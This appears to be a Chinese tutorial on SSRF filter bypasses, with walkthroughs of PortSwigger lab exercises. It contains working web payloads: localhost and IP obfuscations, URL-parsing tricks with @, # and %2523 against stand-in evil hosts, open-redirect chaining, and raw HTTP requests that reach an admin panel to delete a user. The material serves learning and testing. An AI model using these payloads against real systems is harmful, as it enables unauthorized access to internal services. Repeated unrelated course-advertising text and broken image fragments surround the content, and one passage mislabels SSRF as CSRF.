既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
3. 绕过常规的SSRF防御
3.1 基于黑名单过滤的绕过
黑名单往往对127.0.0.1、localhost或类似/admin等敏感url进行过滤。绕过方法如下:
- 127.0.0.1的变形写法
127.1
2130706433
017700000001
- 注册自己的域名,解析为127.0.0.1 可使用spoofed.burpCollaborator.net实现
- 敏感路径可使用
大小写混用/AdmIn``重写/adadminmin
混淆被过滤的字符串
例题 3
3.2 基于白名单匹配的绕过
一些网站采用白名单进行匹配,命中的URL可通过。有时可测试包含白名单开头,或部分来匹配。主要还是利用对URL解析的不一致来绕过白名单,尤其是URL规范中常备忽略的功能。
- URL路径中使用@,前面表示登陆账户凭据
https://expected-host@evil-host
- URL路径中使用#,表示url锚点或片段
https://evil-host#expected-host
- 利用DNS命名层次结构
https://expected-host.evil-host
- 对URL部分进行URL编码以混淆解析
- 上述多种方式的混合使用
例题 4
3.3 利用重定向绕过过滤
有时上面介绍的各种方法均不成功,可尝试查找目标应用中,是否可使用重定向绕过防护。示例如下:
/product/nextProduct?currentProductId=6&path=http://evil-user.net
网站解析支持重定向,解析结果为
http://evil-user.net
完整的SSRF攻击包实例如下:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin
例题 5
3.4 盲注SSRF漏洞利用
原理与上面介绍的相同,唯一不同点就是响应结果,不再通过响应包返回至用户。导致无法直接获取敏感数据,或执行进一步的攻击。
- 使用外带技术(OAST)探测发现盲注SSRF漏洞
原理是,激发内网服务器向外部攻击者控制的域名发送HTTP请求,监控控制的域名下所有的流量,寻找是否有目标内网的交互。若存在,则证明存在SSRF潜在漏洞。
推荐使用工具Burp Collaborator,随机生成被使用者完全监测的域名,完成上述测试。
- 利用DNS lookup获取敏感信息
在控制的域名下插入子域名DNS lookup命令。一般内网会禁止服务器对外的任意网络链接,但往往会允许DNS流量通过(基础设施往往需要DNS服务),
例题 6
利用此种方法探测服务器本身或其他后端系统上的其他漏洞。您可以扫描内部IP地址空间,发送旨在检测已知漏洞的有效负载。如果这些有效负载还采用带外技术,那可能会在未打补丁的内部服务器上发现漏洞。
例题 7
4. 漏洞实例
1. 针对服务器自身的基本SSRF攻击(Basic SSRF against the local server)
- 目标
通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos
- 解题思路
- 在查询库存量的流程中,发现数据包
POST /product/stock HTTP/1.1
Host: 0a03009503626052c08518b500aa008d.web-security-academy.net
stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos
- 改下
stockApi=http%3a%2f%2flocalhost%2fadmin
得到在响应中发现/admin页面已返回,发现删除账户链接。
<a href="/admin/delete?username=carlos">
- 接着构造数据包
POST /product/stock HTTP/1.1
Host: 0a03009503626052c08518b500aa008d.web-security-academy.net
stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos
2. 针对其他后端系统的基本SSRF攻击(Basic SSRF against another back-end system)
- 目标
通过修改库存查询的URL,扫描192.168.0/24网段的8080端口,删除用户carlos
- 解题思路
- 根据提示,将数据包
POST /product/stock
在192.168.0/24网段进行暴力破解,发现路径http://192.168.0.246:8080/admin
后续操作与上题一致
- 根据提示,将数据包
3. 使用SSRF攻击绕过黑名单的过滤(SSRF with blacklist-based input filter)
- 目标
通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos
网站有SSRF安全防护需绕过
- 解题思路
与第1题完全一样,仅是对localhost /admin有过滤限制,可使用大小写绕过。
http://lOcAlHoSt/AdMin
4. 使用SSRF攻击绕过白名单的匹配(SSRF with whitelist-based input filter)
- 目标
通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos
网站有SSRF安全防护需绕过
- 解题思路
- 根据前文讲解,先测试@ 发现
http://username@stock.weliketoshop.net
,发生内部错误,证明未被过滤而是被解析。证明@后路径可被恶意利用。 - 测试# 发现只有结合双重url编码#时(%2523)有效,证明%2523前路径可被恶意利用
- 经多次测试,发下
http://localhost:80%2523@stock.weliketoshop.net/admin
实际解析到了 http://localhost:80/admin - 至此构造删除carlos的ssrf路径
http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos
- 根据前文讲解,先测试@ 发现
5. 利用重定向漏洞绕过SSRF防护(SSRF with filter bypass via open redirection vulnerability)
- 目标
通过修改库存查询的URL,访问到只有管理员才能访问的http://192.168.0.12:8080/admin路径模块,并删除用户carlos
网站有SSRF安全防护需绕过
- 解题思路
此题非常巧妙,是两种漏洞利用的典型,非常有借鉴意义。
经过上述漏洞的测试,我们已经知道:
POST /product/stock
后端调用服务器发起访问,是个潜在的CSRF漏洞点。但是本次靶场加强防护后,之前的绕过方法均不可行
stockApi=%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
- 功能点“下一篇文章”数据包存在重定向功能
GET /product/nextProduct?currentProductId=1&path=/product?productId=2
HTTP/1.1 302 Found
Location: /product?productId=2
Connection: close
Content-Length: 0
- 是否可以尝试将这两个点搭配起来,思路是利用CSRF潜在漏洞为突破点,将其路径更改为这个重定向链接,path参数至为目标路径。
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin
对参数值进行url编码,尝试成功访问到admin页面
6. 带外技术发现盲注SSRF漏洞(Blind SSRF with out-of-band detection)
- 目标
引起内网服务器与Burp Collaborator交互
网站对访问产品页面的外来请求中的Refer
字段进行分析
- 解题思路
7. 使用盲注SSRF漏洞,配合shellshock(Blind SSRF with Shellshock exploitation)
- 目标
利用盲注SSRF发起对192.168.0/24段8080端口的攻击,获取系统用户名称
网站对访问产品页面的外来请求中的Refer
字段进行分析
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
15084486509)]
[外链图片转存中…(img-gCqo2nUo-1715084486509)]
[外链图片转存中…(img-ncCOwywU-1715084486509)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新